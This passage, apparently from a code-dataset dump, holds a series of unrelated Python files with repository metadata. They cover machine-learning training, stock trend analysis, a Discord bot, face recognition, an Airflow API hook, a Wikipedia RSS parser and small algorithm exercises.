df_input.to_csv(tmp_filename, index=False)
df_input = pd.read_csv(tmp_filename)
random_index = np.random.choice(model_indices, len(df_input), p=model_probabilities)
for model_index in range(num_of_models):
print("Training model %d" % model_index)
train_index = [self.select_index(model_index, i) for i in random_index]
watch_index = [not i for i in train_index]
if num_of_models != 1:
x_train = df_input[train_index]
x_watch = df_input[watch_index]
else:
x_train = df_input
x_watch = df_input
target_values = x_train[target_column].unique()
if len(target_values) == 2:
print("Hello separation! j={}, model_index={}".format(j, model_index))
concise_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
nthread=8, gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
concise_model.fit(x_train[training_features], x_train[target_column], \
eval_set=[(x_train[training_features], x_train[target_column]), (x_watch[training_features], x_watch[target_column])], \
eval_metric="rmse", early_stopping_rounds=50)
else:
concise_model = target_values[0]
sub_models.append(concise_model)
concise_models.append(sub_models)
del df_input
gc.collect()
return concise_models
def predict_separation(self, df_test, target_column, concise_models, features, num_of_models, column="", num_of_cats=0):
testing_features = list(features)
testing_features.remove(column)
df_test["predictions_proba"] = 1.0
for j in range(num_of_cats):
print("prediction for cat {}".format(j))
sub_models = concise_models[j]
df_input = df_test[(df_test[column] == j)]
concise_predictions = np.zeros(len(df_input))
for i in range(num_of_models):
if isinstance(sub_models[i], (int, long, float)):
model_predictions = np.empty(len(df_input))
model_predictions.fill(sub_models[i])
else:
model_predictions = np.array(sub_models[i].predict_proba(df_input[testing_features])[:, 1])
concise_predictions = concise_predictions + model_predictions
concise_predictions = concise_predictions / num_of_models
df_test.loc[df_test[column] == j, "predictions_proba"] = concise_predictions
if target_column == "conciseness":
output_filename = os.path.join(self.HOME_DIR, "output", "conciseness_valid.predict")
else:
output_filename = os.path.join(self.HOME_DIR, "output", "clarity_valid.predict")
np.savetxt(output_filename, df_test["predictions_proba"], fmt='%1.10f', delimiter="\n")
#=======================================================================================
if __name__ == '__main__':
dp = DataPreparation()
dp.build_combination(processing_mode=1, out_filename="data_all_conciseness.csv")
dp.clean_data(target_column="conciseness")
feature_man = FeatureManagement()
phase = 1
flags = [True, False]
if flags[0]:
features = feature_man.get_basic_features() + \
feature_man.get_text_features(mode=0, type=0) + \
feature_man.get_text_features(mode=0, type=1)
print("Total number of training features {}".format(len(features)))
print(feature_man.get_basic_features())
no_models = 20
no_rounds = 500
max_depth = 8
learning_rate = 0.1
algo = XGBoostAlgo(max_depth=max_depth, learning_rate=learning_rate)
df_train, df_test = algo.get_input_data(features, "conciseness", label=phase)
concise_models, target_encoding_values = algo.train_concise(df_train, features, num_of_models=no_models, num_of_rounds=no_rounds, is_target_encoding=False, is_calibration=True)
algo.predict_concise(df_test, concise_models, features, num_of_models=no_models, target_encoding_values=target_encoding_values, is_calibration=True)
del df_train
del df_test
gc.collect()
if flags[1]:
features = feature_man.get_basic_features(is_clarity=True) + \
feature_man.get_text_features(mode=0, type=0) + \
feature_man.get_text_features(mode=0, type=1)
print("Total number of clarity training features {}".format(len(features)))
no_models = 10
no_rounds = 400
max_depth = 8
learning_rate = 0.1
algo = XGBoostAlgo(max_depth=max_depth, learning_rate=learning_rate)
df_train, df_test = algo.get_input_data(features, "clarity", label=phase)
clarity_models = algo.train_clarity(df_train, features, num_of_models=no_models, num_of_rounds=no_rounds, is_calibration=False)
algo.predict_clarity(df_test, clarity_models, features, num_of_models=no_models, is_calibration=False)
del df_train
del df_test
gc.collect() | true |
6b4bbe0dc272d92536b658ad3c6bd47f9281eaf1 | Python | jrpike/StockTrack | /LinearIndicators.py | UTF-8 | 4,138 | 3.015625 | 3 | [] | no_license | import DBManager
import itertools
import multiprocessing as mp
import numpy as np
import time
from functools import reduce
from queue import Queue
# Given a numpy array, return a new numpy array of all possible 2-combinations
# ab: The numpy array
def pairwise_combs(ab):
n = len(ab)
N = n * (n - 1) // 2
out = np.empty((N, 2, 2),dtype = ab.dtype)
idx = np.concatenate(([0], np.arange(n- 1, 0, -1).cumsum()))
start, stop = idx[:-1], idx[1:]
for j, i in enumerate(range(n-1)):
out[start[j]:stop[j], 0] = ab[j]
out[start[j]:stop[j], 1] = ab[(j + 1):]
return out
# Given points p1 and p2 from a list of points, return all points between them
# p1: First point (2-dimension numpy array)
# p2: Second point (2-dimension numpy array)
# points: List of points in which p1 and p2 reside (numpy array of 2-dimension arrays)
def pair_range(p1, p2, points):
for i in range(int(p1[0]) + 1, int(p2[0])):
if (i != 0):
yield(points[i])
# Given a difference percentage, calculate and return its loss value
# x: Percent difference (float)
def loss_func(x):
if x >= 0:
tmp = x + 0.7
return np.power((-3 / (np.log2(tmp + 0.85) - np.power(tmp + 0.85, 2))), 4)
return 2 * np.power(((x * 100) - 2), 5)
# Find all valid trend vectors in the date range for the given symbol
# symbol: The ticker symbol
# start_date: First date to consider (YYYY-MM-DD string)
# end_date: Last date to consider (YYYY-MM-DD string)
# type: Which portion of the record to use (record index int, e.g. 5 = daily min)
# See prices table format
# min_distance: The minimum distance between a points to consider it for a trend vector (int)
def find_trend(symbol, start_date, end_date, type, min_distance, running, all_diffs):
try:
print("Finding trends for " + symbol)
# Get all requested records from DB
records = DBManager.get_records(symbol, start_date, end_date)
# Get points from records depending on type parameter
points = []
for idx, val in enumerate(records):
point = np.array([idx, val[type]])
points.append(point)
if len(points) == 0:
return []
# Create a numpy array of points and get all pairs
points = np.asarray(points, dtype = np.float32)
pairs = pairwise_combs(points)
# Last point
lp = points[len(points) - 1]
diffs = []
# Iterate all pairs
for pair in pairs:
p0 = pair[0]
p1 = pair[1]
# Lazy way to enforce min_distance
if p1[0] - p0[0] < min_distance:
continue
# Trend vector to test
v = p1 - p0
diff_arr = []
# Iterate all points between p0 and lp
for p in pair_range(p0, lp, points):
# Get the point where p is projected onto v
v_mod = np.array((p[0], p0[1] + v[1] * (p[0] - p0[0]) / v[0]))
# Find the percent distance from p
diff = p - v_mod
diff_p = diff[1] / p[1]
diff_arr.append(diff_p)
losses = list(map(loss_func, diff_arr))
total_loss = reduce((lambda a, b: a + b), losses)
if (total_loss > 0):
# Get actual dates from pair info
date0 = records[pair[0][0].astype(int)][1]
date1 = records[pair[1][0].astype(int)][1]
diffs.append([symbol, [date0, date1], total_loss])
print("Finished LinearIndicators for " + symbol)
all_diffs.extend(diffs)
except:
pass
running.value -= 1
#return diffs
to_run = Queue()
running = mp.Value('d', 0)
i = 0
symbols = DBManager.get_symbols()
for symbol in symbols:
if i > 100:
break
to_run.put(symbol)
i += 1
all_diffs = []
with mp.Manager() as manager:
l = manager.list()
while not to_run.empty():
if running.value < 40:
p = mp.Process(target = find_trend, args = (to_run.get(), "2019-05-01", "2019-10-02", 5, 10, running, l,))
p.start()
running.value += 1
# Wait for the last processes to finish
while running.value > 0:
time.sleep(1)
print("Waiting for " + str(running.value) + " jobs to complete")
continue
all_diffs.extend(l)
print(len(all_diffs))
all_diffs.sort(key = lambda x: x[2])
all_diffs.reverse()
print(all_diffs[:20])
# Get all support vectors
#vectors = find_trend("AMD", "2019-08-01", "2019-09-19", 5, 10)
# Print the best 10 results
#print(vectors[:10])
| true |
3b7fe2d63b7f959ecaa2bfed6443a231dbe21dce | Python | JakubKoralewski/czy_sa_fale_discord_bot | /czy_sa_fale/bot_dc.py | UTF-8 | 2,592 | 2.921875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
import discord
import logging
import os
import sys
import re
import random
# Set up logging.
#logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logging.basicConfig(filename='app.log', filemode='w',
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logging.warning('Program started.')
# Check if is on a remote location.
try:
DISCORD_TOKEN = os.environ['DISCORD_TOKEN']
logging.debug('on_remote')
except:
from config import DISCORD_TOKEN
logging.debug('not on_remote')
# https://www.devdungeon.com/content/make-discord-bot-python
# Variables:
odpowiedzi = {
'pyt_o_fale': [
'Nie ma fal.'
]
}
basepath = os.path.dirname(__file__)
filepath = os.path.abspath(os.path.join(basepath, "..", "static", "tekst.txt"))
with open(filepath, 'r', encoding='UTF-8') as tekst:
logging.info('otwieram plik z tekstem')
tekst = tekst.read()
# print(tekst)
client = discord.Client()
def czy_pyta_o_fale(message: str) -> None or re.match:
logging.info('funkcja czy_pyta_o_fale wywolana')
logging.info('z argumentem {}'.format(message))
# Czy zawiera '?'.
znak_zapytania = re.compile(r'\?')
znak_zapytania = re.search(znak_zapytania, message)
if not znak_zapytania:
logging.debug('nie zawiera znaku zapytania')
return None
# Czy pyta o fale.
fale = re.compile(r'(fale)|(fal)', re.IGNORECASE)
fale = re.search(fale, message)
if not fale:
logging.debug('nie zawiera fale, fal')
return None
return fale
def odpowiedz_pyt_o_fale() -> str:
logging.info('wybieram losowo z odpowiedzi["py_o_fale"]')
return str(random.choice(odpowiedzi['pyt_o_fale']))
@client.event
async def on_message(message):
# we do not want the bot to reply to itself
if message.author == client.user:
return
if message.content.startswith('!help'):
msg = '!tekst - wypisuje tekst\nSpróbuj też zapytać o fale!'
elif message.content.startswith('!hello'):
msg = 'Elo {0.author.mention}'.format(message)
elif message.content.startswith('!tekst'):
msg = tekst
elif czy_pyta_o_fale(message.content):
msg = odpowiedz_pyt_o_fale()
else:
return
await client.send_message(message.channel, msg)
@client.event
async def on_ready():
login_info = 'Logged in as {}, id: {}\n---------'.format(
client.user.name, client.user.id)
logging.info(login_info)
print(login_info)
client.run(DISCORD_TOKEN)
| true |
ab4d66f22f0032513e84adfd18121e099a962dd5 | Python | NeeruKumar/Face-Recognition | /Face-Recognition.py | UTF-8 | 3,467 | 3.046875 | 3 | [] | no_license |
import face_recognition
import os
import cv2
KNOWN_FACES_DIR = 'known'
UNKNOWN_FACES_DIR = 'unknown'
TOLERANCE = 0.6
FRAME_THICKNESS = 3
FONT_THICKNESS = 2
MODEL = 'cnn' # default: 'hog', other one can be 'cnn' - CUDA accelerated (if available) deep-learning pretrained model
video=cv2.VideoCapture(0)
print('Loading known faces...')
known_faces = []
known_names = []
# We oranize known faces as subfolders of KNOWN_FACES_DIR
# Each subfolder's name becomes our label (name)
for name in os.listdir(KNOWN_FACES_DIR):
image = face_recognition.load_image_file(f'{KNOWN_FACES_DIR}/{name}')
# Always returns a list of found faces, for this purpose we take first face only (assuming one face per image as you can't be twice on one image)
encoding = face_recognition.face_encodings(image)[0]
# Append encodings and name
known_faces.append(encoding)
known_names.append(name.split('.')[0])
print('Processing unknown faces...')
# Now let's loop over a folder of faces we want to label
while True:
ret, image=video.read()
locations = face_recognition.face_locations(image)
# Now since we know loctions, we can pass them to face_encodings as second argument
# Without that it will search for faces once again slowing down whole process
encodings = face_recognition.face_encodings(image, locations)
# We passed our image through face_locations and face_encodings, so we can modify it
# First we need to convert it from RGB to BGR as we are going to work with cv2
# But this time we assume that there might be more faces in an image - we can find faces of dirrerent people
print(f', found {len(encodings)} face(s)')
for face_encoding, face_location in zip(encodings, locations):
# We use compare_faces (but might use face_distance as well)
# Returns array of True/False values in order of passed known_faces
results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)
# Since order is being preserved, we check if any face was found then grab index
# then label (name) of first matching known face withing a tolerance
match = None
if True in results: # If at least one is true, get a name of first of found labels
match = known_names[results.index(True)]
print(f' - {match} from {results}')
# Each location contains positions in order: top, right, bottom, left
top_left = (face_location[3], face_location[0])
bottom_right = (face_location[1], face_location[2])
# Paint frame
cv2.rectangle(image, top_left, bottom_right, (0,0,255), FRAME_THICKNESS)
# Now we need smaller, filled grame below for a name
# This time we use bottom in both corners - to start from bottom and move 50 pixels down
top_left = (face_location[3], face_location[2])
bottom_right = (face_location[1], face_location[2] + 22)
# Paint frame
cv2.rectangle(image, top_left, bottom_right, (0,0,255), cv2.FILLED)
# Wite a name
cv2.putText(image, match, (face_location[3] + 10, face_location[2] + 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (200, 200, 200), FONT_THICKNESS)
# Show image
cv2.imshow('', image)
if cv2.waitKey(1) & 0xFF==ord('q'):
break
| true |
935db5732104003b56e632df0bb853497ef6476e | Python | yu4060/test | /13.py | UTF-8 | 623 | 3.640625 | 4 | [] | no_license | #13. col1.txtとcol2.txtをマージ
#12で作ったcol1.txtとcol2.txtを結合し,元のファイルの1列目と2列目をタブ区切りで並べたテキストファイルを作成せよ.確認にはpasteコマンドを用いよ.
with open('col1.txt', "r") as f1:
data1 = f1.read()
data1 = data1.split('\n') #前回の課題でcol1に入れた改行を一度消している
with open('col2.txt', "r") as f2:
data2 = f2.read()
data2 = data2.split('\n')
with open('col.txt', "w") as f:
for (a, b) in zip(data1, data2):
f.write(a + '\t' + b + '\n')
# 確認
# paste col1.txt col2.txt
| true |
ab30f5a7d1d146c270266da2e7da6acc06e51a7e | Python | epicteller/epicteller | /epicteller/core/util/validator.py | UTF-8 | 476 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from typing import Optional
from email_validator import validate_email, EmailNotValidError
def parse_external_id_from_qq_email(email_str: str) -> Optional[str]:
try:
email = validate_email(email_str, check_deliverability=False)
except EmailNotValidError:
return
assert isinstance(email.local_part, str)
if email.local_part.isdigit() and email.domain == 'qq.com':
return email.local_part
| true |
6a35b2ae29f69ed3d7b8599c5aa869c6d58f6147 | Python | candyer/leetcode | /2020 November LeetCoding Challenge/20_search.py | UTF-8 | 1,570 | 4.09375 | 4 | [] | no_license | # https://leetcode.com/explore/challenge/card/november-leetcoding-challenge/566/week-3-november-15th-november-21st/3537/
# Search in Rotated Sorted Array II
# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.
# (i.e., [0,0,1,2,2,5,6] might become [2,5,6,0,0,1,2]).
# You are given a target value to search. If found in the array return true, otherwise return false.
# Example 1:
# Input: nums = [2,5,6,0,0,1,2], target = 0
# Output: true
# Example 2:
# Input: nums = [2,5,6,0,0,1,2], target = 3
# Output: false
# Follow up:
# This is a follow up problem to Search in Rotated Sorted Array, where nums may contain duplicates.
# Would this affect the run-time complexity? How and why?
from typing import List
def search(nums: List[int], target: int) -> bool:
n = len(nums)
left, right = 0, n - 1
while left <= right:
mid = (left + right) // 2
if target == nums[mid]:
return True
while nums[left] == nums[mid] and left < mid:
left += 1
if nums[left] <= nums[mid]: #nums[left:mid] is ordered
if nums[left] <= target < nums[mid]: #target in nums[left:mid]
right = mid - 1
else: #target in nums[mid:right]
left = mid + 1
else: #nums[mid:] is ordered
if nums[mid] < target <= nums[right]: #target in nums[mid:right]
left = mid + 1
else: #target in nums[left:mid]
right = mid - 1
return False
assert(search([1, 3, 1, 1, 1], 3) == True)
assert(search([2,5,6,0,0,1,2], 0) == True)
assert(search([2,5,6,0,0,1,2], 3) == False)
assert(search([2,5,6,0,0,1,2], 5) == True)
| true |
9d4e1b20b8aa4b1eac0397bc03bb17f6d3c76101 | Python | datamechanics/datamechanics_airflow_plugin | /datamechanics_airflow_plugin/hook.py | UTF-8 | 4,264 | 2.53125 | 3 | [
"Apache-2.0"
] | permissive | from airflow.hooks.base_hook import BaseHook
from airflow import __version__
from airflow.exceptions import AirflowException
from urllib.parse import urljoin
import requests
import time
from requests import exceptions as requests_exceptions
SUBMIT_APP_ENDPOINT = ("POST", "api/apps/")
GET_APP_ENDPOINT = ("GET", "api/apps/{}")
DELETE_APP_ENDPOINT = ("DELETE", "api/apps/{}")
USER_AGENT_HEADER = {"user-agent": "airflow-{v}".format(v=__version__)}
class DataMechanicsHook(BaseHook):
def __init__(
self,
dm_conn_id="datamechanics_default",
timeout_seconds=180,
retry_limit=3,
retry_delay=1.0,
):
self.dm_conn_id = dm_conn_id
self.dm_conn = self.get_connection(dm_conn_id)
self.timeout_seconds = timeout_seconds
if retry_limit < 1:
raise ValueError("Retry limit must be greater than equal to 1")
self.retry_limit = retry_limit
self.retry_delay = retry_delay
def _do_api_call(self, endpoint_info, payload=None):
"""
Utility function to perform an API call with retries
:param endpoint_info: Tuple of method and endpoint
:type endpoint_info: tuple[string, string]
:param payload: Parameters for this API call.
:type payload: dict
:return: If the api call returns a OK status code,
this function returns the response in JSON. Otherwise,
we throw an AirflowException.
:rtype: dict
"""
method, endpoint = endpoint_info
api_key = self.dm_conn.password
url = urljoin(self.dm_conn.host, endpoint)
headers = {**USER_AGENT_HEADER, "X-API-Key": api_key}
if method == "GET":
request_func = requests.get
elif method == "POST":
request_func = requests.post
elif method == "DELETE":
request_func = requests.delete
else:
raise AirflowException("Unexpected HTTP Method: " + method)
attempt_num = 1
while True:
try:
response = request_func(
url, json=payload, headers=headers, timeout=self.timeout_seconds
)
response.raise_for_status()
return response.json()
except requests_exceptions.RequestException as e:
if not _retryable_error(e):
# In this case, the user probably made a mistake.
# Don't retry.
raise AirflowException(
"Response: {0}, Status Code: {1}".format(
e.response.content, e.response.status_code
)
)
self._log_request_error(attempt_num, e)
if attempt_num == self.retry_limit:
raise AirflowException(
(
"API requests to Data Mechanics failed {} times. "
+ "Giving up."
).format(self.retry_limit)
)
attempt_num += 1
time.sleep(self.retry_delay)
def _log_request_error(self, attempt_num, error):
self.log.error(
"Attempt %s API Request to Data Mechanics failed with reason: %s",
attempt_num,
error,
)
def submit_app(self, payload):
response = self._do_api_call(SUBMIT_APP_ENDPOINT, payload)
return response["appName"]
def get_app(self, app_name):
method, path = GET_APP_ENDPOINT
filled_endpoint = (method, path.format(app_name))
response = self._do_api_call(filled_endpoint)
return response
def kill_app(self, app_name):
method, path = DELETE_APP_ENDPOINT
filled_endpoint = (method, path.format(app_name))
response = self._do_api_call(filled_endpoint)
return response
def get_app_page_url(self, app_name):
return urljoin(self.dm_conn.host, "dashboard/apps/{}".format(app_name))
def _retryable_error(exception):
return isinstance(
exception, (requests_exceptions.ConnectionError, requests_exceptions.Timeout)
) or (exception.response is not None and exception.response.status_code >= 500)
| true |
e589e804a49b1fec0adff8140832df2a4e298ee9 | Python | giovannyortegon/holbertonschool-machine_learning | /supervised_learning/0x03-optimization/14-batch_norm.py | UTF-8 | 1,099 | 2.859375 | 3 | [] | no_license | #!/usr/bin/env python3
""" batch normalization """
import tensorflow as tf
def create_batch_norm_layer(prev, n, activation):
""" create_batch_norm_layer
Args:
prev is the activated output of the previous layer
n is the number of nodes in the layer to be created
activation is the activation function that should be
used on the output of the layer.
Return:
a tensor of the activated output for the layer
"""
init = tf.contrib.layers.variance_scaling_initializer(mode="FAN_AVG")
hidden = tf.layers.Dense(
units=n,
kernel_initializer=init
)
Z = hidden(prev)
epsilon = 1e-8
beta = tf.Variable(
tf.constant(0.0, shape=[n]),
name="beta",
trainable=True
)
gamma = tf.Variable(
tf.constant(1.0, shape=[n]),
name="gamma",
trainable=True
)
mean, var = tf.nn.moments(Z, axes=[0])
Z_hat = tf.nn.batch_normalization(Z, mean, var, beta, gamma, epsilon)
if activation is None:
return Z_hat
return activation(Z_hat)
| true |
92f5540e2ff232f2ff6bb2e49b4ecef13ae91c11 | Python | Siddhantham/pythonAssg | /20 integer inputs.py | UTF-8 | 176 | 3.453125 | 3 | [] | no_license | a = 20
lis = []
for i in range(a):
if (len(lis) !=20):
lis.append(int(input()))
lis.sort()
lis.reverse()
for i in lis:
if (i%3 ==0):
print(i) | true |
b60d3fa8ecc3fa307b778114f36b7dfac15809c8 | Python | clokep/wp-current-events-rss | /parser.py | UTF-8 | 10,002 | 2.6875 | 3 | [] | no_license | from datetime import date, datetime, timedelta
from urllib.parse import quote as url_quote
import feedgenerator
import mwparserfromhell
from mwparserfromhell.definitions import MARKUP_TO_HTML
from mwparserfromhell.nodes import Comment, ExternalLink, HTMLEntity, Tag, Template, Text, Wikilink
from mwparserfromhell.wikicode import Wikicode
import requests
# The MARKUP_TO_HTML is missing a few things...this duck punches them in.
MARKUP_TO_HTML.update({
"''": 'i',
})
class UnknownNode(Exception):
pass
class HtmlComposingError(Exception):
pass
class WikicodeToHtmlComposer(object):
"""
Format HTML from Parsed Wikicode.
Note that this is not currently re-usable.
https://en.wikipedia.org/wiki/Help:Wiki_markup
"""
def __init__(self, base_url='https://en.wikipedia.org/wiki'):
# The base URL should be the root that articles sit in.
self._base_url = base_url.rstrip('/')
self._wanted_lists = []
# Track the currently open tags.
self._stack = []
def _get_url(self, title):
"""Given a page title, return a URL suitable for linking."""
safe_title = url_quote(title.encode('utf-8'))
return '{}/{}'.format(self._base_url, safe_title)
def _close_stack(self, tag=None, raise_on_missing=True):
"""Close tags that are on the stack. It closes all tags until ``tag`` is found.
If no tag to close is given the entire stack is closed.
"""
# Close the entire stack.
if tag is None:
for current_tag in reversed(self._stack):
yield u'</{}>'.format(current_tag)
return
# If a tag was given, close all tags behind it (in reverse order).
if tag not in self._stack:
# TODO
if raise_on_missing:
raise HtmlComposingError('Unable to close given tags.')
else:
return
while len(self._stack):
current_tag = self._stack.pop()
yield u'</{}>'.format(current_tag)
if current_tag == tag:
break
def _add_part(self, part):
"""Append a part, closing any parts of the stack that should be closed here."""
if self._wanted_lists:
stack_lists = [node for node in self._stack if node in ['ul', 'ol', 'dl']]
# Remove the prefixed part of the lists that match.
i = 0
shortest = min([len(stack_lists), len(self._wanted_lists)])
for i in range(shortest):
if stack_lists[i] != self._wanted_lists[i]:
break
else:
i = shortest
# Now close anything left in stack_lists.
for node in reversed(stack_lists[i:]):
yield from self._close_stack(node)
# Open anything in wanted_lists.
for node in self._wanted_lists[i:]:
self._stack.append(node)
yield u'<{}>'.format(node)
# Finally, open the list item.
if self._wanted_lists[-1] == 'dl':
item_tag = 'dt'
else:
item_tag = 'li'
self._stack.append(item_tag)
yield u'<{}>'.format(item_tag)
# Reset the list.
self._wanted_lists = []
yield part
# Certain tags get closed when there's a line break.
if self._stack:
for c in reversed(part):
if c == '\n':
elements_to_close = ['li', 'ul', 'ol', 'dl', 'dt']
# Close an element in the stack.
if self._stack[-1] in elements_to_close:
yield from self._close_stack(self._stack[-1])
else:
break
def _compose_parts(self, obj):
"""Takes an object and returns a generator that will compose one more pieces of HTML."""
if isinstance(obj, Wikicode):
for node in obj.ifilter(recursive=False):
yield from self._compose_parts(node)
elif isinstance(obj, Tag):
# Some tags require a parent tag to be open first, but get grouped
# if one is already open.
if obj.wiki_markup == '*':
self._wanted_lists.append('ul')
# Don't allow a ul inside of a dl.
yield from self._close_stack('dl', raise_on_missing=False)
elif obj.wiki_markup == '#':
self._wanted_lists.append('ol')
# Don't allow a ul inside of a dl.
yield from self._close_stack('dl', raise_on_missing=False)
elif obj.wiki_markup == ';':
self._wanted_lists.append('dl')
# Don't allow dl instead ol or ul.
yield from self._close_stack('ol', raise_on_missing=False)
yield from self._close_stack('ul', raise_on_missing=False)
else:
# Create an HTML tag.
# TODO Handle attributes.
yield from self._add_part(u'<{}>'.format(obj.tag))
self._stack.append(obj.tag)
for child in obj.__children__():
yield from self._compose_parts(child)
# Self closing tags don't need an end tag, this produces "broken"
# HTML, but readers should handle it fine.
if not obj.self_closing:
# Close this tag and any other open tags after it.
yield from self._close_stack(obj.tag)
elif isinstance(obj, Wikilink):
# Different text can be specified, or falls back to the title.
text = obj.text or obj.title
url = self._get_url(obj.title)
yield from self._add_part(u'<a href="{}">'.format(url))
yield from self._compose_parts(text)
yield from self._add_part(u'</a>')
elif isinstance(obj, ExternalLink):
# Different text can be specified, or falls back to the URL.
text = obj.title or obj.url
yield from self._add_part(u'<a href="{}">'.format(obj.url))
yield from self._compose_parts(text)
yield from self._add_part(u'</a>')
elif isinstance(obj, Comment):
yield from self._add_part(u'<!-- {} -->'.format(obj.contents))
elif isinstance(obj, Text):
yield from self._add_part(obj.value)
elif isinstance(obj, (HTMLEntity, Template)):
# TODO
yield from self._add_part(str(obj))
elif isinstance(obj, (list, tuple)):
# If the object is iterable, just handle each item separately.
for node in obj:
yield from self._compose_parts(node)
else:
raise UnknownNode(u'Unknown node type: {}'.format(type(obj)))
def compose(self, obj):
"""Converts Wikicode or Node objects to HTML."""
# TODO Add a guard that this can only be called once at a time.
return u''.join(self._compose_parts(obj)) + u''.join(self._close_stack())
def filter_templates(node):
"""Remove nodes that are only whitespace."""
return not isinstance(node, Template)
def get_article_url(lookup_date):
# Format the date as a string, this is formatted using the #time extension
# to Wiki syntax:
# https://www.mediawiki.org/wiki/Help:Extension:ParserFunctions#.23time with
# a format of "Y F j". This is awkward because we want the day *not* zero
# padded, but the month as a string.
datestr = '{} {} {}'.format(lookup_date.year, lookup_date.strftime('%B'), lookup_date.day)
return 'https://en.wikipedia.org/wiki/Portal:Current_events/' + datestr
def get_article_by_date(lookup_date):
"""
Returns the article content for a particular day, this requests a page like
https://en.wikipedia.org/wiki/Portal:Current_events/2017_May_5
"""
response = requests.get(get_article_url(lookup_date), params={'action': 'raw'})
return response.content
def get_articles():
"""
Returns a map of dates to a list of current events on that date.
The root of this is parsing https://en.wikipedia.org/wiki/Portal:Current_events
The true information we're after is included via
https://en.wikipedia.org/wiki/Portal:Current_events/Inclusion
which then includes the past seven days.
"""
feed = feedgenerator.Rss201rev2Feed('Wikipedia: Portal: Current events',
'https://en.wikipedia.org/wiki/Portal:Current_events',
'Wikipedia: Portal: Current events')
# Start at today.
day = date.today()
for i in range(7):
day -= timedelta(days=1)
# Download the article content.
article = get_article_by_date(day)
# Parse the article contents.
wikicode = mwparserfromhell.parse(article)
nodes = wikicode.filter(recursive=False, matches=filter_templates)
# Remove all nodes before / after the start / end comments.
start = 0
end = len(nodes) - 1
for i, node in enumerate(nodes):
if isinstance(node, Comment):
if 'All news items below this line' in node:
start = i + 1
elif 'All news items above this line' in node:
end = i
break
# Ignore nodes outside of the start/end.
nodes = nodes[start:end]
composer = WikicodeToHtmlComposer()
try:
feed.add_item(title=u'Current events: {}'.format(day),
link=get_article_url(day),
description=composer.compose(nodes),
pubdate=datetime(*day.timetuple()[:3]))
except HtmlComposingError:
print("Unable to render article from: {}".format(day))
return feed.writeString('utf-8')
if __name__ == '__main__':
get_articles()
| true |
60e708849612f1b3d3791a434eb1ebb79052785d | Python | theerawatramchuen/dogDetector | /dogDet.py | UTF-8 | 2,020 | 3.15625 | 3 | [] | no_license |
# Importing the Keras libraries and packages
from keras.models import Sequential
from keras.layers import Convolution2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
from keras.models import load_model
# Initialising the CNN
classifier = Sequential()
# Step 1 - Convolution
classifier.add(Convolution2D(32, 3, 3, input_shape = (64, 64, 3), activation = 'relu'))
# Step 2 - Pooling
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Adding a second convolutional layer
classifier.add(Convolution2D(32, 3, 3, activation = 'relu'))
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Step 3 - Flattening
classifier.add(Flatten())
# Step 4 - Full connection
classifier.add(Dense(output_dim = 128, activation = 'relu'))
classifier.add(Dense(output_dim = 1, activation = 'sigmoid'))
# Compiling the CNN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Part 2 - Loading model weight
classifier.load_weights('EBS-Eval-bs16-ep200.h5')
# Part 3 Prediction Image from video
import numpy as np
from keras.preprocessing import image as image_utils
import time
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
while(cap.isOpened()):
start = time.time()
ret, frame = cap.read()
if ret == True:
cv2.imshow('frame',frame)
cv2.imwrite('temp.jpg',frame)
test_image = image_utils.load_img('temp.jpg', target_size = (64, 64))
test_image = image_utils.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
result = classifier.predict_on_batch(test_image)
if result[0][0] == 1:
prediction = 'REJECT'
else:
prediction = 'GOOD'
end = time.time()
print ('I guess it is... ',prediction,' by ',round((end - start)*1000),' miliSeconds')
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows
| true |
beb8e8da9663b2c8cd84210d4c99ef922522d5a1 | Python | jonathanlebron/solving-puzzles | /circular_primes.py | UTF-8 | 1,632 | 4.09375 | 4 | [
"MIT"
] | permissive | # Description:
# The number, 197, is called a circular prime because
# all rotations of the digits: 197, 971, and 719, are
# themselves prime.
# There are thirteen such primes below 100:
# 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
#
# How many circular primes are there below one million?
#
# - From http://projecteuler.net/problem=35
''' SIEVE OF ERATOSTHENES '''
# Author: Jonathan Lebron (Github: jonathanlebron, Twitter: _jlebron)
# Date: 11/8/2013
import math, time
start = time.clock()
num = 100000
primes = [True]*num
primes[0] = False
primes[1] = False
# Generate list of primes
m = int(math.sqrt(num))+1
for i in xrange(2, m):
if primes[i]:
# if number is prime, set all multiples to 0
# and subtract from total
for j in xrange(i*2, num, i):
if primes[j]:
primes[j] = False
count = 0
seen = {}
for i in xrange(2,num):
if primes[i] and i not in seen:
currNum = str(i)
isCircularPrime = True # assume it is a circular prime
numRotations = 1
# iterate through each rotation and check if it is prime
for j in xrange(1,len(currNum)):
currRotation = currNum[j:]+currNum[:j]
currInt = int(currRotation)
if currInt != i:
numRotations += 1
seen[currInt] = True
if not primes[currInt]:
isCircularPrime = False
break
if isCircularPrime:
count += numRotations
end = time.clock() - start
print "answer is: ", count
print "took ", end, " seconds"
''' END SIEVE OF ERATOSTHENES '''
| true |
8def003e91ac8e6235d5b0d4f5d4c898b14b48d2 | Python | chenxingyuoo/learn | /python_learn/廖雪峰python/16.网络编程/tpc_client.py | UTF-8 | 485 | 2.984375 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
# 服务器地址(主机,端口)
